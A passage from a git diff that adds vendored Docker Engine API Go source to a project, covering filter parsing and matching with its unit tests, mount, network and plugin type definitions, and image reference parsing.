len(filters.fields) +} + +// MatchKVList returns true if the values for the specified field matches the ones +// from the sources. +// e.g. given Args are {'label': {'label1=1','label2=1'}, 'image.name', {'ubuntu'}}, +// field is 'label' and sources are {'label1': '1', 'label2': '2'} +// it returns true. +func (filters Args) MatchKVList(field string, sources map[string]string) bool { + fieldValues := filters.fields[field] + + //do not filter if there is no filter set or cannot determine filter + if len(fieldValues) == 0 { + return true + } + + if len(sources) == 0 { + return false + } + + for name2match := range fieldValues { + testKV := strings.SplitN(name2match, "=", 2) + + v, ok := sources[testKV[0]] + if !ok { + return false + } + if len(testKV) == 2 && testKV[1] != v { + return false + } + } + + return true +} + +// Match returns true if the values for the specified field matches the source string +// e.g. given Args are {'label': {'label1=1','label2=1'}, 'image.name', {'ubuntu'}}, +// field is 'image.name' and source is 'ubuntu' +// it returns true. +func (filters Args) Match(field, source string) bool { + if filters.ExactMatch(field, source) { + return true + } + + fieldValues := filters.fields[field] + for name2match := range fieldValues { + match, err := regexp.MatchString(name2match, source) + if err != nil { + continue + } + if match { + return true + } + } + return false +} + +// ExactMatch returns true if the source matches exactly one of the filters. +func (filters Args) ExactMatch(field, source string) bool { + fieldValues, ok := filters.fields[field] + //do not filter if there is no filter set or cannot determine filter + if !ok || len(fieldValues) == 0 { + return true + } + + // try to match full name value to avoid O(N) regular expression matching + return fieldValues[source] +} + +// UniqueExactMatch returns true if there is only one filter and the source matches exactly this one. +func (filters Args) UniqueExactMatch(field, source string) bool { + fieldValues := filters.fields[field] + //do not filter if there is no filter set or cannot determine filter + if len(fieldValues) == 0 { + return true + } + if len(filters.fields[field]) != 1 { + return false + } + + // try to match full name value to avoid O(N) regular expression matching + return fieldValues[source] +} + +// FuzzyMatch returns true if the source matches exactly one of the filters, +// or the source has one of the filters as a prefix. +func (filters Args) FuzzyMatch(field, source string) bool { + if filters.ExactMatch(field, source) { + return true + } + + fieldValues := filters.fields[field] + for prefix := range fieldValues { + if strings.HasPrefix(source, prefix) { + return true + } + } + return false +} + +// Include returns true if the name of the field to filter is in the filters. +func (filters Args) Include(field string) bool { + _, ok := filters.fields[field] + return ok +} + +// Validate ensures that all the fields in the filter are valid. +// It returns an error as soon as it finds an invalid field. +func (filters Args) Validate(accepted map[string]bool) error { + for name := range filters.fields { + if !accepted[name] { + return fmt.Errorf("Invalid filter '%s'", name) + } + } + return nil +} + +// WalkValues iterates over the list of filtered values for a field. +// It stops the iteration if it finds an error and it returns that error. +func (filters Args) WalkValues(field string, op func(value string) error) error { + if _, ok := filters.fields[field]; !ok { + return nil + } + for v := range filters.fields[field] { + if err := op(v); err != nil { + return err + } + } + return nil +} + +func deprecatedArgs(d map[string][]string) map[string]map[string]bool { + m := map[string]map[string]bool{} + for k, v := range d { + values := map[string]bool{} + for _, vv := range v { + values[vv] = true + } + m[k] = values + } + return m +} + +func convertArgsToSlice(f map[string]map[string]bool) map[string][]string { + m := map[string][]string{} + for k, v := range f { + values := []string{} + for kk := range v { + if v[kk] { + values = append(values, kk) + } + } + m[k] = values + } + return m +} diff --git a/vendor/github.com/docker/docker/api/types/filters/parse_test.go b/vendor/github.com/docker/docker/api/types/filters/parse_test.go new file mode 100644 index 0000000000..b2ed27b9ce --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/filters/parse_test.go @@ -0,0 +1,417 @@ +package filters + +import ( + "fmt" + "testing" +) + +func TestParseArgs(t *testing.T) { + // equivalent of `docker ps -f 'created=today' -f 'image.name=ubuntu*' -f 'image.name=*untu'` + flagArgs := []string{ + "created=today", + "image.name=ubuntu*", + "image.name=*untu", + } + var ( + args = NewArgs() + err error + ) + for i := range flagArgs { + args, err = ParseFlag(flagArgs[i], args) + if err != nil { + t.Errorf("failed to parse %s: %s", flagArgs[i], err) + } + } + if len(args.Get("created")) != 1 { + t.Errorf("failed to set this arg") + } + if len(args.Get("image.name")) != 2 { + t.Errorf("the args should have collapsed") + } +} + +func TestParseArgsEdgeCase(t *testing.T) { + var filters Args + args, err := ParseFlag("", filters) + if err != nil { + t.Fatal(err) + } + if args.Len() != 0 { + t.Fatalf("Expected an empty Args (map), got %v", args) + } + if args, err = ParseFlag("anything", args); err == nil || err != ErrBadFormat { + t.Fatalf("Expected ErrBadFormat, got %v", err) + } +} + +func TestToParam(t *testing.T) { + fields := map[string]map[string]bool{ + "created": {"today": true}, + "image.name": {"ubuntu*": true, "*untu": true}, + } + a := Args{fields: fields} + + _, err := ToParam(a) + if err != nil { + t.Errorf("failed to marshal the filters: %s", err) + } +} + +func TestToParamWithVersion(t *testing.T) { + fields := map[string]map[string]bool{ + "created": {"today": true}, + "image.name": {"ubuntu*": true, "*untu": true}, + } + a := Args{fields: fields} + + str1, err := ToParamWithVersion("1.21", a) + if err != nil { + t.Errorf("failed to marshal the filters with version < 1.22: %s", err) + } + str2, err := ToParamWithVersion("1.22", a) + if err != nil { + t.Errorf("failed to marshal the filters with version >= 1.22: %s", err) + } + if str1 != `{"created":["today"],"image.name":["*untu","ubuntu*"]}` && + str1 != `{"created":["today"],"image.name":["ubuntu*","*untu"]}` { + t.Errorf("incorrectly marshaled the filters: %s", str1) + } + if str2 != `{"created":{"today":true},"image.name":{"*untu":true,"ubuntu*":true}}` && + str2 != `{"created":{"today":true},"image.name":{"ubuntu*":true,"*untu":true}}` { + t.Errorf("incorrectly marshaled the filters: %s", str2) + } +} + +func TestFromParam(t *testing.T) { + invalids := []string{ + "anything", + "['a','list']", + "{'key': 'value'}", + `{"key": "value"}`, + } + valid := map[*Args][]string{ + &Args{fields: map[string]map[string]bool{"key": {"value": true}}}: { + `{"key": ["value"]}`, + `{"key": {"value": true}}`, + }, + &Args{fields: map[string]map[string]bool{"key": {"value1": true, "value2": true}}}: { + `{"key": ["value1", "value2"]}`, + `{"key": {"value1": true, "value2": true}}`, + }, + &Args{fields: map[string]map[string]bool{"key1": {"value1": true}, "key2": {"value2": true}}}: { + `{"key1": ["value1"], "key2": ["value2"]}`, + `{"key1": {"value1": true}, "key2": {"value2": true}}`, + }, + } + + for _, invalid := range invalids { + if _, err := FromParam(invalid); err == nil { + t.Fatalf("Expected an error with %v, got nothing", invalid) + } + } + + for expectedArgs, matchers := range valid { + for _, json := range matchers { + args, err := FromParam(json) + if err != nil { + t.Fatal(err) + } + if args.Len() != expectedArgs.Len() { + t.Fatalf("Expected %v, go %v", expectedArgs, args) + } + for key, expectedValues := range expectedArgs.fields { + values := args.Get(key) + + if len(values) != len(expectedValues) { + t.Fatalf("Expected %v, go %v", expectedArgs, args) + } + + for _, v := range values { + if !expectedValues[v] { + t.Fatalf("Expected %v, go %v", expectedArgs, args) + } + } + } + } + } +} + +func TestEmpty(t *testing.T) { + a := Args{} + v, err := ToParam(a) + if err != nil { + t.Errorf("failed to marshal the filters: %s", err) + } + v1, err := FromParam(v) + if err != nil { + t.Errorf("%s", err) + } + if a.Len() != v1.Len() { + t.Errorf("these should both be empty sets") + } +} + +func TestArgsMatchKVListEmptySources(t *testing.T) { + args := NewArgs() + if !args.MatchKVList("created", map[string]string{}) { + t.Fatalf("Expected true for (%v,created), got true", args) + } + + args = Args{map[string]map[string]bool{"created": {"today": true}}} + if args.MatchKVList("created", map[string]string{}) { + t.Fatalf("Expected false for (%v,created), got true", args) + } +} + +func TestArgsMatchKVList(t *testing.T) { + // Not empty sources + sources := map[string]string{ + "key1": "value1", + "key2": "value2", + "key3": "value3", + } + + matches := map[*Args]string{ + &Args{}: "field", + &Args{map[string]map[string]bool{ + "created": map[string]bool{"today": true}, + "labels": map[string]bool{"key1": true}}, + }: "labels", + &Args{map[string]map[string]bool{ + "created": map[string]bool{"today": true}, + "labels": map[string]bool{"key1=value1": true}}, + }: "labels", + } + + for args, field := range matches { + if args.MatchKVList(field, sources) != true { + t.Fatalf("Expected true for %v on %v, got false", sources, args) + } + } + + differs := map[*Args]string{ + &Args{map[string]map[string]bool{ + "created": map[string]bool{"today": true}}, + }: "created", + &Args{map[string]map[string]bool{ + "created": map[string]bool{"today": true}, + "labels": map[string]bool{"key4": true}}, + }: "labels", + &Args{map[string]map[string]bool{ + "created": map[string]bool{"today": true}, + "labels": map[string]bool{"key1=value3": true}}, + }: "labels", + } + + for args, field := range differs { + if args.MatchKVList(field, sources) != false { + t.Fatalf("Expected false for %v on %v, got true", sources, args) + } + } +} + +func TestArgsMatch(t *testing.T) { + source := "today" + + matches := map[*Args]string{ + &Args{}: "field", + &Args{map[string]map[string]bool{ + "created": map[string]bool{"today": true}}, + }: "today", + &Args{map[string]map[string]bool{ + "created": map[string]bool{"to*": true}}, + }: "created", + &Args{map[string]map[string]bool{ + "created": map[string]bool{"to(.*)": true}}, + }: "created", + &Args{map[string]map[string]bool{ + "created": map[string]bool{"tod": true}}, + }: "created", + &Args{map[string]map[string]bool{ + "created": map[string]bool{"anyting": true, "to*": true}}, + }: "created", + } + + for args, field := range matches { + if args.Match(field, source) != true { + t.Fatalf("Expected true for %v on %v, got false", source, args) + } + } + + differs := map[*Args]string{ + &Args{map[string]map[string]bool{ + "created": map[string]bool{"tomorrow": true}}, + }: "created", + &Args{map[string]map[string]bool{ + "created": map[string]bool{"to(day": true}}, + }: "created", + &Args{map[string]map[string]bool{ + "created": map[string]bool{"tom(.*)": true}}, + }: "created", + &Args{map[string]map[string]bool{ + "created": map[string]bool{"tom": true}}, + }: "created", + &Args{map[string]map[string]bool{ + "created": map[string]bool{"today1": true}, + "labels": map[string]bool{"today": true}}, + }: "created", + } + + for args, field := range differs { + if args.Match(field, source) != false { + t.Fatalf("Expected false for %v on %v, got true", source, args) + } + } +} + +func TestAdd(t *testing.T) { + f := NewArgs() + f.Add("status", "running") + v := f.fields["status"] + if len(v) != 1 || !v["running"] { + t.Fatalf("Expected to include a running status, got %v", v) + } + + f.Add("status", "paused") + if len(v) != 2 || !v["paused"] { + t.Fatalf("Expected to include a paused status, got %v", v) + } +} + +func TestDel(t *testing.T) { + f := NewArgs() + f.Add("status", "running") + f.Del("status", "running") + v := f.fields["status"] + if v["running"] { + t.Fatalf("Expected to not include a running status filter, got true") + } +} + +func TestLen(t *testing.T) { + f := NewArgs() + if f.Len() != 0 { + t.Fatalf("Expected to not include any field") + } + f.Add("status", "running") + if f.Len() != 1 { + t.Fatalf("Expected to include one field") + } +} + +func TestExactMatch(t *testing.T) { + f := NewArgs() + + if !f.ExactMatch("status", "running") { + t.Fatalf("Expected to match `running` when there are no filters, got false") + } + + f.Add("status", "running") + f.Add("status", "pause*") + + if !f.ExactMatch("status", "running") { + t.Fatalf("Expected to match `running` with one of the filters, got false") + } + + if f.ExactMatch("status", "paused") { + t.Fatalf("Expected to not match `paused` with one of the filters, got true") + } +} + +func TestOnlyOneExactMatch(t *testing.T) { + f := NewArgs() + + if !f.UniqueExactMatch("status", "running") { + t.Fatalf("Expected to match `running` when there are no filters, got false") + } + + f.Add("status", "running") + + if !f.UniqueExactMatch("status", "running") { + t.Fatalf("Expected to match `running` with one of the filters, got false") + } + + if f.UniqueExactMatch("status", "paused") { + t.Fatalf("Expected to not match `paused` with one of the filters, got true") + } + + f.Add("status", "pause") + if f.UniqueExactMatch("status", "running") { + t.Fatalf("Expected to not match only `running` with two filters, got true") + } +} + +func TestInclude(t *testing.T) { + f := NewArgs() + if f.Include("status") { + t.Fatalf("Expected to not include a status key, got true") + } + f.Add("status", "running") + if !f.Include("status") { + t.Fatalf("Expected to include a status key, got false") + } +} + +func TestValidate(t *testing.T) { + f := NewArgs() + f.Add("status", "running") + + valid := map[string]bool{ + "status": true, + "dangling": true, + } + + if err := f.Validate(valid); err != nil { + t.Fatal(err) + } + + f.Add("bogus", "running") + if err := f.Validate(valid); err == nil { + t.Fatalf("Expected to return an error, got nil") + } +} + +func TestWalkValues(t *testing.T) { + f := NewArgs() + f.Add("status", "running") + f.Add("status", "paused") + + f.WalkValues("status", func(value string) error { + if value != "running" && value != "paused" { + t.Fatalf("Unexpected value %s", value) + } + return nil + }) + + err := f.WalkValues("status", func(value string) error { + return fmt.Errorf("return") + }) + if err == nil { + t.Fatalf("Expected to get an error, got nil") + } + + err = f.WalkValues("foo", func(value string) error { + return fmt.Errorf("return") + }) + if err != nil { + t.Fatalf("Expected to not iterate when the field doesn't exist, got %v", err) + } +} + +func TestFuzzyMatch(t *testing.T) { + f := NewArgs() + f.Add("container", "foo") + + cases := map[string]bool{ + "foo": true, + "foobar": true, + "barfoo": false, + "bar": false, + } + for source, match := range cases { + got := f.FuzzyMatch("container", source) + if got != match { + t.Fatalf("Expected %v, got %v: %s", match, got, source) + } + } +} diff --git a/vendor/github.com/docker/docker/api/types/id_response.go b/vendor/github.com/docker/docker/api/types/id_response.go new file mode 100644 index 0000000000..7592d2f8b1 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/id_response.go @@ -0,0 +1,13 @@ +package types + +// This file was generated by the swagger tool. +// Editing this file might prove futile when you re-run the swagger generate command + +// IDResponse Response to an API call that returns just an Id +// swagger:model IdResponse +type IDResponse struct { + + // The id of the newly created object. + // Required: true + ID string `json:"Id"` +} diff --git a/vendor/github.com/docker/docker/api/types/image_summary.go b/vendor/github.com/docker/docker/api/types/image_summary.go new file mode 100644 index 0000000000..e145b3dcfc --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/image_summary.go @@ -0,0 +1,49 @@ +package types + +// This file was generated by the swagger tool. +// Editing this file might prove futile when you re-run the swagger generate command + +// ImageSummary image summary +// swagger:model ImageSummary +type ImageSummary struct { + + // containers + // Required: true + Containers int64 `json:"Containers"` + + // created + // Required: true + Created int64 `json:"Created"` + + // Id + // Required: true + ID string `json:"Id"` + + // labels + // Required: true + Labels map[string]string `json:"Labels"` + + // parent Id + // Required: true + ParentID string `json:"ParentId"` + + // repo digests + // Required: true + RepoDigests []string `json:"RepoDigests"` + + // repo tags + // Required: true + RepoTags []string `json:"RepoTags"` + + // shared size + // Required: true + SharedSize int64 `json:"SharedSize"` + + // size + // Required: true + Size int64 `json:"Size"` + + // virtual size + // Required: true + VirtualSize int64 `json:"VirtualSize"` +} diff --git a/vendor/github.com/docker/docker/api/types/mount/mount.go b/vendor/github.com/docker/docker/api/types/mount/mount.go new file mode 100644 index 0000000000..31f2365b8e --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/mount/mount.go @@ -0,0 +1,113 @@ +package mount + +import ( + "os" +) + +// Type represents the type of a mount. +type Type string + +// Type constants +const ( + // TypeBind is the type for mounting host dir + TypeBind Type = "bind" + // TypeVolume is the type for remote storage volumes + TypeVolume Type = "volume" + // TypeTmpfs is the type for mounting tmpfs + TypeTmpfs Type = "tmpfs" +) + +// Mount represents a mount (volume). +type Mount struct { + Type Type `json:",omitempty"` + // Source specifies the name of the mount. Depending on mount type, this + // may be a volume name or a host path, or even ignored. + // Source is not supported for tmpfs (must be an empty value) + Source string `json:",omitempty"` + Target string `json:",omitempty"` + ReadOnly bool `json:",omitempty"` + + BindOptions *BindOptions `json:",omitempty"` + VolumeOptions *VolumeOptions `json:",omitempty"` + TmpfsOptions *TmpfsOptions `json:",omitempty"` +} + +// Propagation represents the propagation of a mount. +type Propagation string + +const ( + // PropagationRPrivate RPRIVATE + PropagationRPrivate Propagation = "rprivate" + // PropagationPrivate PRIVATE + PropagationPrivate Propagation = "private" + // PropagationRShared RSHARED + PropagationRShared Propagation = "rshared" + // PropagationShared SHARED + PropagationShared Propagation = "shared" + // PropagationRSlave RSLAVE + PropagationRSlave Propagation = "rslave" + // PropagationSlave SLAVE + PropagationSlave Propagation = "slave" +) + +// Propagations is the list of all valid mount propagations +var Propagations = []Propagation{ + PropagationRPrivate, + PropagationPrivate, + PropagationRShared, + PropagationShared, + PropagationRSlave, + PropagationSlave, +} + +// BindOptions defines options specific to mounts of type "bind". +type BindOptions struct { + Propagation Propagation `json:",omitempty"` +} + +// VolumeOptions represents the options for a mount of type volume. +type VolumeOptions struct { + NoCopy bool `json:",omitempty"` + Labels map[string]string `json:",omitempty"` + DriverConfig *Driver `json:",omitempty"` +} + +// Driver represents a volume driver. +type Driver struct { + Name string `json:",omitempty"` + Options map[string]string `json:",omitempty"` +} + +// TmpfsOptions defines options specific to mounts of type "tmpfs". +type TmpfsOptions struct { + // Size sets the size of the tmpfs, in bytes. + // + // This will be converted to an operating system specific value + // depending on the host. For example, on linux, it will be convered to + // use a 'k', 'm' or 'g' syntax. BSD, though not widely supported with + // docker, uses a straight byte value. + // + // Percentages are not supported. + SizeBytes int64 `json:",omitempty"` + // Mode of the tmpfs upon creation + Mode os.FileMode `json:",omitempty"` + + // TODO(stevvooe): There are several more tmpfs flags, specified in the + // daemon, that are accepted. Only the most basic are added for now. + // + // From docker/docker/pkg/mount/flags.go: + // + // var validFlags = map[string]bool{ + // "": true, + // "size": true, X + // "mode": true, X + // "uid": true, + // "gid": true, + // "nr_inodes": true, + // "nr_blocks": true, + // "mpol": true, + // } + // + // Some of these may be straightforward to add, but others, such as + // uid/gid have implications in a clustered system. +} diff --git a/vendor/github.com/docker/docker/api/types/network/network.go b/vendor/github.com/docker/docker/api/types/network/network.go new file mode 100644 index 0000000000..832b3edb9f --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/network/network.go @@ -0,0 +1,59 @@ +package network + +// Address represents an IP address +type Address struct { + Addr string + PrefixLen int +} + +// IPAM represents IP Address Management +type IPAM struct { + Driver string + Options map[string]string //Per network IPAM driver options + Config []IPAMConfig +} + +// IPAMConfig represents IPAM configurations +type IPAMConfig struct { + Subnet string `json:",omitempty"` + IPRange string `json:",omitempty"` + Gateway string `json:",omitempty"` + AuxAddress map[string]string `json:"AuxiliaryAddresses,omitempty"` +} + +// EndpointIPAMConfig represents IPAM configurations for the endpoint +type EndpointIPAMConfig struct { + IPv4Address string `json:",omitempty"` + IPv6Address string `json:",omitempty"` + LinkLocalIPs []string `json:",omitempty"` +} + +// PeerInfo represents one peer of a overlay network +type PeerInfo struct { + Name string + IP string +} + +// EndpointSettings stores the network endpoint details +type EndpointSettings struct { + // Configurations + IPAMConfig *EndpointIPAMConfig + Links []string + Aliases []string + // Operational data + NetworkID string + EndpointID string + Gateway string + IPAddress string + IPPrefixLen int + IPv6Gateway string + GlobalIPv6Address string + GlobalIPv6PrefixLen int + MacAddress string +} + +// NetworkingConfig represents the container's networking configuration for each of its interfaces +// Carries the networking configs specified in the `docker run` and `docker network connect` commands +type NetworkingConfig struct { + EndpointsConfig map[string]*EndpointSettings // Endpoint configs for each connecting network +} diff --git a/vendor/github.com/docker/docker/api/types/plugin.go b/vendor/github.com/docker/docker/api/types/plugin.go new file mode 100644 index 0000000000..6cc7a23b02 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/plugin.go @@ -0,0 +1,189 @@ +package types + +// This file was generated by the swagger tool. +// Editing this file might prove futile when you re-run the swagger generate command + +// Plugin A plugin for the Engine API +// swagger:model Plugin +type Plugin struct { + + // config + // Required: true + Config PluginConfig `json:"Config"` + + // True when the plugin is running. False when the plugin is not running, only installed. + // Required: true + Enabled bool `json:"Enabled"` + + // Id + ID string `json:"Id,omitempty"` + + // name + // Required: true + Name string `json:"Name"` + + // plugin remote reference used to push/pull the plugin + PluginReference string `json:"PluginReference,omitempty"` + + // settings + // Required: true + Settings PluginSettings `json:"Settings"` +} + +// PluginConfig The config of a plugin. +// swagger:model PluginConfig +type PluginConfig struct { + + // args + // Required: true + Args PluginConfigArgs `json:"Args"` + + // description + // Required: true + Description string `json:"Description"` + + // documentation + // Required: true + Documentation string `json:"Documentation"` + + // entrypoint + // Required: true + Entrypoint []string `json:"Entrypoint"` + + // env + // Required: true + Env []PluginEnv `json:"Env"` + + // interface + // Required: true + Interface PluginConfigInterface `json:"Interface"` + + // linux + // Required: true + Linux PluginConfigLinux `json:"Linux"` + + // mounts + // Required: true + Mounts []PluginMount `json:"Mounts"` + + // network + // Required: true + Network PluginConfigNetwork `json:"Network"` + + // propagated mount + // Required: true + PropagatedMount string `json:"PropagatedMount"` + + // user + User PluginConfigUser `json:"User,omitempty"` + + // work dir + // Required: true + WorkDir string `json:"WorkDir"` + + // rootfs + Rootfs *PluginConfigRootfs `json:"rootfs,omitempty"` +} + +// PluginConfigArgs plugin config args +// swagger:model PluginConfigArgs +type PluginConfigArgs struct { + + // description + // Required: true + Description string `json:"Description"` + + // name + // Required: true + Name string `json:"Name"` + + // settable + // Required: true + Settable []string `json:"Settable"` + + // value + // Required: true + Value []string `json:"Value"` +} + +// PluginConfigInterface The interface between Docker and the plugin +// swagger:model PluginConfigInterface +type PluginConfigInterface struct { + + // socket + // Required: true + Socket string `json:"Socket"` + + // types + // Required: true + Types []PluginInterfaceType `json:"Types"` +} + +// PluginConfigLinux plugin config linux +// swagger:model PluginConfigLinux +type PluginConfigLinux struct { + + // allow all devices + // Required: true + AllowAllDevices bool `json:"AllowAllDevices"` + + // capabilities + // Required: true + Capabilities []string `json:"Capabilities"` + + // devices + // Required: true + Devices []PluginDevice `json:"Devices"` +} + +// PluginConfigNetwork plugin config network +// swagger:model PluginConfigNetwork +type PluginConfigNetwork struct { + + // type + // Required: true + Type string `json:"Type"` +} + +// PluginConfigRootfs plugin config rootfs +// swagger:model PluginConfigRootfs +type PluginConfigRootfs struct { + + // diff ids + DiffIds []string `json:"diff_ids"` + + // type + Type string `json:"type,omitempty"` +} + +// PluginConfigUser plugin config user +// swagger:model PluginConfigUser +type PluginConfigUser struct { + + // g ID + GID uint32 `json:"GID,omitempty"` + + // UID + UID uint32 `json:"UID,omitempty"` +} + +// PluginSettings Settings that can be modified by users. +// swagger:model PluginSettings +type PluginSettings struct { + + // args + // Required: true + Args []string `json:"Args"` + + // devices + // Required: true + Devices []PluginDevice `json:"Devices"` + + // env + // Required: true + Env []string `json:"Env"` + + // mounts + // Required: true + Mounts []PluginMount `json:"Mounts"` +} diff --git a/vendor/github.com/docker/docker/api/types/plugin_device.go b/vendor/github.com/docker/docker/api/types/plugin_device.go new file mode 100644 index 0000000000..5699010675 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/plugin_device.go @@ -0,0 +1,25 @@ +package types + +// This file was generated by the swagger tool. +// Editing this file might prove futile when you re-run the swagger generate command + +// PluginDevice plugin device +// swagger:model PluginDevice +type PluginDevice struct { + + // description + // Required: true + Description string `json:"Description"` + + // name + // Required: true + Name string `json:"Name"` + + // path + // Required: true + Path *string `json:"Path"` + + // settable + // Required: true + Settable []string `json:"Settable"` +} diff --git a/vendor/github.com/docker/docker/api/types/plugin_env.go b/vendor/github.com/docker/docker/api/types/plugin_env.go new file mode 100644 index 0000000000..32962dc2eb --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/plugin_env.go @@ -0,0 +1,25 @@ +package types + +// This file was generated by the swagger tool. +// Editing this file might prove futile when you re-run the swagger generate command + +// PluginEnv plugin env +// swagger:model PluginEnv +type PluginEnv struct { + + // description + // Required: true + Description string `json:"Description"` + + // name + // Required: true + Name string `json:"Name"` + + // settable + // Required: true + Settable []string `json:"Settable"` + + // value + // Required: true + Value *string `json:"Value"` +} diff --git a/vendor/github.com/docker/docker/api/types/plugin_interface_type.go b/vendor/github.com/docker/docker/api/types/plugin_interface_type.go new file mode 100644 index 0000000000..c82f204e87 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/plugin_interface_type.go @@ -0,0 +1,21 @@ +package types + +// This file was generated by the swagger tool. +// Editing this file might prove futile when you re-run the swagger generate command + +// PluginInterfaceType plugin interface type +// swagger:model PluginInterfaceType +type PluginInterfaceType struct { + + // capability + // Required: true + Capability string `json:"Capability"` + + // prefix + // Required: true + Prefix string `json:"Prefix"` + + // version + // Required: true + Version string `json:"Version"` +} diff --git a/vendor/github.com/docker/docker/api/types/plugin_mount.go b/vendor/github.com/docker/docker/api/types/plugin_mount.go new file mode 100644 index 0000000000..5c031cf8b5 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/plugin_mount.go @@ -0,0 +1,37 @@ +package types + +// This file was generated by the swagger tool. +// Editing this file might prove futile when you re-run the swagger generate command + +// PluginMount plugin mount +// swagger:model PluginMount +type PluginMount struct { + + // description + // Required: true + Description string `json:"Description"` + + // destination + // Required: true + Destination string `json:"Destination"` + + // name + // Required: true + Name string `json:"Name"` + + // options + // Required: true + Options []string `json:"Options"` + + // settable + // Required: true + Settable []string `json:"Settable"` + + // source + // Required: true + Source *string `json:"Source"` + + // type + // Required: true + Type string `json:"Type"` +} diff --git a/vendor/github.com/docker/docker/api/types/plugin_responses.go b/vendor/github.com/docker/docker/api/types/plugin_responses.go new file mode 100644 index 0000000000..d6f7553119 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/plugin_responses.go @@ -0,0 +1,64 @@ +package types + +import ( + "encoding/json" + "fmt" +) + +// PluginsListResponse contains the response for the Engine API +type PluginsListResponse []*Plugin + +const ( + authzDriver = "AuthzDriver" + graphDriver = "GraphDriver" + ipamDriver = "IpamDriver" + networkDriver = "NetworkDriver" + volumeDriver = "VolumeDriver" +) + +// UnmarshalJSON implements json.Unmarshaler for PluginInterfaceType +func (t *PluginInterfaceType) UnmarshalJSON(p []byte) error { + versionIndex := len(p) + prefixIndex := 0 + if len(p) < 2 || p[0] != '"' || p[len(p)-1] != '"' { + return fmt.Errorf("%q is not a plugin interface type", p) + } + p = p[1 : len(p)-1] +loop: + for i, b := range p { + switch b { + case '.': + prefixIndex = i + case '/': + versionIndex = i + break loop + } + } + t.Prefix = string(p[:prefixIndex]) + t.Capability = string(p[prefixIndex+1 : versionIndex]) + if versionIndex < len(p) { + t.Version = string(p[versionIndex+1:]) + } + return nil +} + +// MarshalJSON implements json.Marshaler for PluginInterfaceType +func (t *PluginInterfaceType) MarshalJSON() ([]byte, error) { + return json.Marshal(t.String()) +} + +// String implements fmt.Stringer for PluginInterfaceType +func (t PluginInterfaceType) String() string { + return fmt.Sprintf("%s.%s/%s", t.Prefix, t.Capability, t.Version) +} + +// PluginPrivilege describes a permission the user has to accept +// upon installing a plugin. +type PluginPrivilege struct { + Name string + Description string + Value []string +} + +// PluginPrivileges is a list of PluginPrivilege +type PluginPrivileges []PluginPrivilege diff --git a/vendor/github.com/docker/docker/api/types/port.go b/vendor/github.com/docker/docker/api/types/port.go new file mode 100644 index 0000000000..ad52d46d56 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/port.go @@ -0,0 +1,23 @@ +package types + +// This file was generated by the swagger tool. +// Editing this file might prove futile when you re-run the swagger generate command + +// Port An open port on a container +// swagger:model Port +type Port struct { + + // IP + IP string `json:"IP,omitempty"` + + // Port on the container + // Required: true + PrivatePort uint16 `json:"PrivatePort"` + + // Port exposed on the host + PublicPort uint16 `json:"PublicPort,omitempty"` + + // type + // Required: true + Type string `json:"Type"` +} diff --git a/vendor/github.com/docker/docker/api/types/reference/image_reference.go b/vendor/github.com/docker/docker/api/types/reference/image_reference.go new file mode 100644 index 0000000000..be9cf8ebed --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/reference/image_reference.go @@ -0,0 +1,34 @@ +package reference + +import ( + distreference "github.com/docker/distribution/reference" +) + +// Parse parses the given references and returns the repository and +// tag (if present) from it. If there is an error during parsing, it will +// return an error. +func Parse(ref string) (string, string, error) { + distributionRef, err := distreference.ParseNamed(ref) + if err != nil { + return "", "", err + } + + tag := GetTagFromNamedRef(distributionRef) + return distributionRef.Name(), tag, nil +} + +// GetTagFromNamedRef returns a tag from the specified reference. +// This function is necessary as long as the docker "server" api makes the distinction between repository +// and tags. +func GetTagFromNamedRef(ref distreference.Named) string { + var tag string + switch x := ref.(type) { + case distreference.Digested: + tag = x.Digest().String() + case distreference.NamedTagged: + tag = x.Tag() + default: + tag = "latest" + } + return tag +} diff --git a/vendor/github.com/docker/docker/api/types/reference/image_reference_test.go b/vendor/github.com/docker/docker/api/types/reference/image_reference_test.go new file mode 100644 index 0000000000..61fb676b6c --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/reference/image_reference_test.go @@ -0,0 +1,72 @@ +package reference + +import ( + "testing" +) + +func TestParse(t *testing.T) { + testCases := []struct { + ref string + expectedName string + expectedTag string + expectedError bool + }{ + { + ref: "", + expectedName: "", + expectedTag: "", + expectedError: true, + }, + { + ref: "repository", + expectedName: "repository", + expectedTag: "latest", + expectedError: false, + }, + { + ref: "repository:tag", + expectedName: "repository", + expectedTag: "tag", + expectedError: false, + }, + { + ref: "test.com/repository", + expectedName: "test.com/repository", + expectedTag: "latest", + expectedError: false, + }, + { + ref: "test.com:5000/test/repository", + expectedName: "test.com:5000/test/repository", + expectedTag: "latest", + expectedError: false, + }, + { + ref: "test.com:5000/repo@sha256:ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff", + expectedName: "test.com:5000/repo", + expectedTag: "sha256:ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff", + expectedError: false, + }, + { + ref: "test.com:5000/repo:tag@sha256:ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff", + expectedName: "test.com:5000/repo", + expectedTag: "sha256:ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff", + expectedError: false, + }, + } + + for _, c := range testCases { + name, tag, err := Parse(c.ref) + if err != nil && c.expectedError { + continue + } else if err != nil { + t.Fatalf("error with %s: %s", c.ref, err.Error()) + } + if name != c.expectedName { + t.Fatalf("expected name %s, got %s", c.expectedName, name) + } + if tag != c.expectedTag { + t.Fatalf("expected tag %s, got %s", c.expectedTag, tag) + } + } +} diff --git a/vendor/github.com/docker/docker/api/types/registry/authenticate.go b/vendor/github.com/docker/docker/api/types/registry/authenticate.go new file mode 100644 index 0000000000..5e37d19bd4 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/registry/authenticate.go @@ -0,0 +1,21 @@ +package registry + +// ---------------------------------------------------------------------------- +// DO NOT EDIT THIS FILE +// This file was generated by `swagger generate 